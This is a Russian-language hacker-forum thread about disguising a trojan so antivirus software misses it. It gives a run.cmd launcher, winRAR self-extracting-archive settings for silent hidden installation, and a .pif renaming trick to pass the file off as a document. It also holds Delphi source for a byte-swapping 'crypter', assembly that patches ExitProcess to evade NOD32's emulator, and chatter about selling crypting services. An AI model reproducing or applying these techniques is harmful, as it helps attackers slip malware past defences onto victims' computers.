И так у нас есть трой...НО он палится антивирями. Что делать? Идти покупать криптор - нет это не для нас... Писать свой трой или криптор - не все умеют, а иногда лень... Теперь мы сделаем это подручными средствами за минуту... Нужно: winRAR и программа crypter, написанная Talisman'ом специально для этого дела... 1. Подготавливаем внутренность архива. Внутренности архива: Ваши файлы + 3 следующих файла: 1. run.cmd 2. 1.exe 3. crypter.exe, найдете в конце статьи ---- 1.exe - и есть ваш троянчек. В run.cmd пишем следующее: Code: start yourprogramm.exe start crypter.exe start 1.exe exit , где yourprogramm.exe - ваша нормальная программа. Что это делает? при запуске run.cmd у нас запускается crypter.exe и все=) Теперь рассмотрим crypter.exe: Это всего навсего программа, которая меняет порядок байт в файле(то есть делает кашу). При первом запуске она меняет порядок файлов, при втором возвращает все на место. ----- И так для первого шага кладем ваш exe'шный файл в какую-то папку, туда же кладем своего трояна с именем 1.exe, туда же кладем run.cmd с кодом выше^^ и туда же кладем cryptor.exe. Теперь запускаем crypter.exe и у нас файл перепутался и антивирус теперь не палит его... 2. Делаем sfx архив: Выделяем наши файлы и жмем добавить в архив. Отмечаем пункт 'Создать SFX-архив'. Переходим на вкладку дополнительно и жмем 'Параметры SFX'. Переходим на вкладку Режимы и отмечаем пункт Скрыть все и Перезаписывать все файлы (теперь при запуске архива не будет выводиться никаких окон). Переходим на вкладку Общие. Нас будет интересовать путь для распаковки. Можно здесь прописать путь к папке в которую будут извлекаться файлы. Все файлы будут извлекаться в одну папку. Можете написать "%windir%". Иконку для результирующего исполняемого файла можно выбрать на вкладке Текст и Иконки , нажав на кнопку Обзор. На вкладке Общие в поле выполнить после распаковки пишем run.cmd --------- Дополнение: Переименуем любой exe файл в pif. О-ба! все работает так же=) но во-первых pif'a в винде не видно и во-вторых очень часто путают с документами Acrobat Reade'a --------- Pif с непропатченным браузером IE запускается при клике на ссылку, не нужно нажимать сохранить и так далее... --------- Статья сделана на основе http://forum.antichat.ru/thread24979.html Она будет постепенно обновляться, так как у меня есть еще очень много полезных идей, чтоб замаскировать троян от антивирусов. ============================ Crypter.exe: Работает только с файлом с именем 1.exe http://slil.ru/23344495 Написал Talisman ============================ Просьба писать о всех недочетах и ошибках, найденных в статье
Ясное дело проактивная защита будет палить=) а проскань на вирусджоти = не будет... это еще не все=) я еще буду дописывать... 100% не палящийся способ= на этом яб не плохо заработал=) А это инфа к размышлению и додумыванию
ReanimatoR ты б лучше криптор выложил для ламаков каких нибудь, у меня их довала, но они приватные и дать немогу(кстати я их взял бесплатно, сеть 2 месяца серфинговал)
~Real F@ck!~ Угумс, я видел.... Как на dl, про тебя писали что ты ко всем в аси лез и просил криптор Смотреть тут
ReanimatoR ненадо выкладывать криптор, я так к слову сказал, у меня их довала, а кому надо тот пусть тему или ещё что нить создаёт!
Раскрою секрет криптора-кашеварителя вся его суть заключается в изменении сигнатур программы 1.exe - чтобы не палили антивири, как это проще всего сделать? менять местами байты экзешника, причем чтобы не гемороится - симметричным менять алгоритмом - запустил криптор четное число раз - ничего не изменилось, а нечетное - прога превратилась в мусор. Вот код на Делфи: Code: [COLOR=Green]program krip;[/COLOR] [COLOR=Green]uses[/COLOR] SysUtils, Classes; [COLOR=Red]// минимальный "карсет" программы[/COLOR] [COLOR=Green]var[/COLOR] [COLOR=DarkOrange]f[/COLOR]:tfileStream; [COLOR=Red]// переменная, в которую поместим криптуемый файл[/COLOR] [COLOR=DarkOrange]s1[/COLOR],[COLOR=DarkOrange]s2[/COLOR]:byte; [COLOR=Red]// перемещаемые байты[/COLOR] [COLOR=DarkOrange]s[/COLOR],[COLOR=DarkOrange]ss[/COLOR]:int64; [COLOR=Red]// адреса в 64 ричной системе[/COLOR] [COLOR=DarkOrange]i[/COLOR]:integer; [COLOR=Red]// просто счетчик)[/COLOR] [COLOR=Green]begin[/COLOR] [COLOR=DarkOrange]f[/COLOR]:=tfilestream.create('1.exe', fmOpenReadWrite); [COLOR=Red]// грузим файл на чтение и запись[/COLOR] [COLOR=DarkOrange]i[/COLOR]:=222; [COLOR=Red]// устанавливаем начальное значение счетчика в 222, чтобы не затереть PE - заголовок (хотя можно и затирать ) )[/COLOR] [COLOR=DarkRed]while[/COLOR] i<int([COLOR=DarkOrange]f[/COLOR].Size) [COLOR=DarkRed]do begin[/COLOR] [COLOR=Red]// пускаем цикл до длины файла[/COLOR] [COLOR=DarkOrange]s[/COLOR]:=int64([COLOR=DarkOrange]i[/COLOR]); [COLOR=Red]// преобразуем счетчик в адрес типа int64[/COLOR] [COLOR=DarkOrange]ss[/COLOR]:=int64([COLOR=DarkOrange]i[/COLOR]+1); //получаем адрес следующего байта [COLOR=DarkOrange]f[/COLOR].seek([COLOR=DarkOrange]s[/COLOR], soFromBeginning); [COLOR=Red]// переходим в файле на [COLOR=DarkOrange]s[/COLOR] байт с начала файла[/COLOR] [COLOR=DarkOrange]f[/COLOR].read([COLOR=DarkOrange]s1[/COLOR],sizeof(s1)); [COLOR=Red]// читаем значение байта в [COLOR=DarkOrange]s1[/COLOR][/COLOR] [COLOR=DarkOrange]f[/COLOR].seek([COLOR=DarkOrange]ss[/COLOR], soFromBeginning); [COLOR=Red]// переходим в байт [COLOR=DarkOrange]ss[/COLOR] (следующий за [COLOR=DarkOrange]s[/COLOR])[/COLOR] [COLOR=DarkOrange]f[/COLOR].read([COLOR=DarkOrange]s2[/COLOR],sizeof(s2)); [COLOR=Red]// считываем [COLOR=DarkOrange]s2[/COLOR][/COLOR] [COLOR=DarkOrange]f[/COLOR].seek([COLOR=DarkOrange]s[/COLOR], soFromBeginning); [COLOR=Red]// переходим на [COLOR=DarkOrange]s[/COLOR][/COLOR] [COLOR=DarkOrange]f[/COLOR].Write([COLOR=DarkOrange]s2[/COLOR],sizeof(s2)); [COLOR=Red]// пишем [COLOR=DarkOrange]s2[/COLOR][/COLOR] [COLOR=DarkOrange]f[/COLOR].seek([COLOR=DarkOrange]ss[/COLOR], soFromBeginning); [COLOR=Red]// переходим на [COLOR=DarkOrange]ss[/COLOR][/COLOR] [COLOR=DarkOrange]f[/COLOR].Write([COLOR=DarkOrange]s1[/COLOR],sizeof(s1)); [COLOR=Red]// пишем [COLOR=DarkOrange]s1[/COLOR][/COLOR] [COLOR=Red]// т.е. мы поменяли местами 2 идущих подряд байта[/COLOR] [COLOR=DarkOrange]i[/COLOR]:=[COLOR=DarkOrange]i[/COLOR]+2; [COLOR=Red]// увеличиваем счетчик на 2, чтобы менять байты парами, а не "лесенкой"[/COLOR] [COLOR=DarkRed]end;[/COLOR] [COLOR=Red]// идем в начало цикла while[/COLOR] [COLOR=DarkOrange]f[/COLOR].free; [COLOR=Red]// освобождаем файл[/COLOR] [COLOR=Green]end. [/COLOR][COLOR=Red]// завершаем работу)[/COLOR]
Talisman +1 Ksander эт ты ачат позориш нах, я ваще в халяву попросился, меня непустили да ещё и вот это повесили, и ещё всё началось лиш из-за пинча 2.60 который с дамагелаба я выложил на античат! Mukis несмеши людей, я за 1$ криптую а ты за 3$ ! У меня ток аваст палит и сё, если у тебя даже нечё непалит ты что то с ценой загнул!
Мда...собрались люди... 1. удалите свой флуд. Разборки в ПМ 2. это НЕ КРИПТОР! Это всего навсего штука, которая делает из файла КАШУ. И чтоб запустить файл, нужно опять запустить эту прогу=). Это можно делать любым архиватотром, который поддерживает раззиповку с паролем из командной строки(например Orien)
Блин у меня проблема, я все делаю по инструкции, запускаю уже гатовый архив мне пишет ошибку что типа фаил не евляется програмой для вин32, я как понимаю в run.cmd не выплолняется команда start crypter.exe раньше все норм работало, а теперь блин... может кто встречался с проблемой? + меня раньше в винраре где прописываеш адрес куда будет распоковывотся, можно было галку ставить абсолютный путь, а теперь как пропачтил винрар т.к. срок истек нильзя туда галку ставить вобще из-за чего может быть проблема?
я вам сейчас возможно открою секрет, а возможно нет насколько я знаю у NOD32 самый мощный эвристик/эмулятор кода я придумал (возможно не я первый) его обходить таким способом: записать первым байтом ExitProcess retn (0xc3), вызвать ее а потом восстановить старый байт (надо его прочитать) выдираю код (с анти-интеллектульным мусором) из одной своей фигни (все исправлять уже очень лень) Code: ; WriteProcessMemory at kernel32.ExitProcess mov eax, 0x1f mov ecx, WriteProcessMemory+0x43 mov edi, ecx inc eax dec eax lea ebx, [bwrite] nop nop jmp nop5 dd 0x90909090 dd 0x90909090 dd 0x90909090 dd 0x90909090 nop5: push ebx push 3 lea ebx, [cmd_retn] push ebx mov ebx, ExitProcess-2 inc ebx sub ebx, -1 nop nop mov ecx, [ebx] xchg ebx, ecx sub eax, 2 nop nop aad xor [cmd_retn], 0x55 jmp nop6 dd 0x90909090 dd 0x90909090 dd 0x90909090 dd 0x90909090 nop6: sub ebx, eax push ebx add dword [esp], 0x1f dec dword [esp] mov esi, edi dec dword [esp] push 1 dec dword [esp] sub dword [esp], 1 mov ecx, esi jmp nop7 dd 0x90909090 dd 0x90909090 dd 0x90909090 dd 0x90909090 nop7: call dword [ecx-0x43] nop nop ; jmp ml ; goodbye, NOD32 heu finvoke ExitProcess, 0 когда я это все делал, работало отлично. NOD видел завершение обычное процесса и весь код дальше его эмулятор не выполнял. далее можно расшифровывать любым алгоритмом остальной код и запускать его. На SEH нод не реагирует. Из этого помоему уже можно что-нибудь придумать. Добавьте некоторые старые антиотладочные приёмы, сделайте навесной расшифровщик постраничный и у вас получится офигенный криптор. хэк?
полне согласен , НО товарисч помог тем которые ищут то что не могут сами зделать или написать , то есть комуто + и не тока кому то , а и от кавота если не забудут тож , я думаю не сложно 1 рах написать для кавота то есть для чайника что и как и почему , если он не дурак возможность использует ну а если дурак то увы , етот + в сторону каспера итп......
Всем привет у меня проблемма. При запуске файла, вирус не успевает вовремя перекодироваться и из-за этого ничего не работает. Теперь вопрос: Как поставить задержку на .cmd? Cпасибо.
